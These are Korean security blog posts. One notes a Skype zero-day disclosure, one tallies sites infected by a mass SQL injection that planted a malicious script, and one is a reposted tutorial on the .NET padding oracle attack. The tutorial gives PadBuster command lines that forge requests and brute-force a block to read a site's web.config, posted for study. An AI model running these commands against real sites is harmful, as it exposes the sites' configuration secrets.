exploit-DB를 통해 Voip 서비스로 유명한 Skype의  제로데이 취약점이 화이트 페이퍼로 공개되었다.
pc로 사용하시는 분들은 각별히 유념하셔야 겠네요. 물론 모바일도..조심 -0-;




[출처] Exploit-db.com


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

Posted by bitfox
l

어제 해커 뉴스에 나온 내용을 바탕으로 국내 감염 실태를 확인해 봤습니다.
여러 패턴이 있지만 그 중에 이슈가 되는 IIS/ASP.net만 노리는 "hxxp://jjghui.com/urchin.js"를
대상으로 확인해보니..


무려 백오십만건이 발견되었습니다. 간단한 구글링만으로.. 물론 중복된 링크도 있겠지만 더 많을
것으로 파악하고 있습니다. 필자가 뉴스를 접했을 때 백만건 정도 였으나 뉴스에 나온것보다 30%증가한 수치네요..-0-;;

문제는 백오십만건 중 국내 사이트는...

 

거의 6십만건에 이르고 있습니다. 그 중에 공공기관도 몇 군대 발견되었는데..
1차 피해보다는 2차, 3차 감염 피해가 우려되는 상황입니다.

[경고 : 검색된 위에 사이트에 접근시 바이러스 감염 및 침해 당할 수 있으니 안전한 조치가 
없을시 촉수 불가 합니다.]


이 지능적인 Mass-Sql 인젝션에 대해 공격에 대한 정보 및 대응 방안은 링크로 첨부하겠습니다.

[Mass SQL Injection Attack Hits Sites Running IIS] Link
[Mass infection of IIS/ASP sites] Link
[SQL/JavaScript Hybrid Worms] Link



오늘도 지뢰밭을 피해 안전한 검색 하시길.. -0-;; 

Posted by bitfox
l

Padding oracle attack explained

In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the server leaks data about whether the padding of an encrypted message is correct or not. oracle refers to a mechanism in cryptography that can be used to determine whether a test has passed or failed. This information would help an attacker to decrypt and encrypt data without key.

How to find your .NET application is vulnerable to padding oracle attack or not?

    1. Using burp proxy capture a request to webresource.axd file
      Ex: http://somesite.com/webresource.axd?d=qmZbysenet6VGS94Ord8gQ2
    2. Change one character in the d value and send the request to the server. Observe the response.
    3. Send request to a non existent aspx page on the server. Observe the response.
      Ex: http://somesite.com/nonexist.aspx
    4. Response 2 and response 3 are differ, then it is possible to exploit the attack.

My OWASP presentation on 20-Aug-2011:

padbuster tool can be used to automate the padding oracle attack. This tool is a free ware and you can download it from – https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl

* Perl is required to run padbuster. Perl can be downloaded from
http://strawberry-perl.googlecode.com/files/strawberry-perl-5.12.3.0.msi

Padbuster usage to attack .NET applications

  1. Encrypt web.config file –
    padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2
    AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config
  2. Brute force the first block-
    padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAA
    AAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce –log
  3. Observe the log, at some point you will get 200 ok message, grab that URL and paste it in browser. It displays the web.config content.

Watch this video to get a better understanding of the attack:




[출처]
http://securitylearn.wordpress.com/2011/08/19/padding-oracle-attack-explained/



[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 뚱띵이_SQL' 카테고리의 다른 글

My-SQL을 이용한 Webshell 만들기  (0) 2012.02.28
SQL Injection Cheat Sheet  (0) 2011.10.13
Aqua Fold - Aqua Data Studio  (0) 2011.08.09
Posted by bitfox
l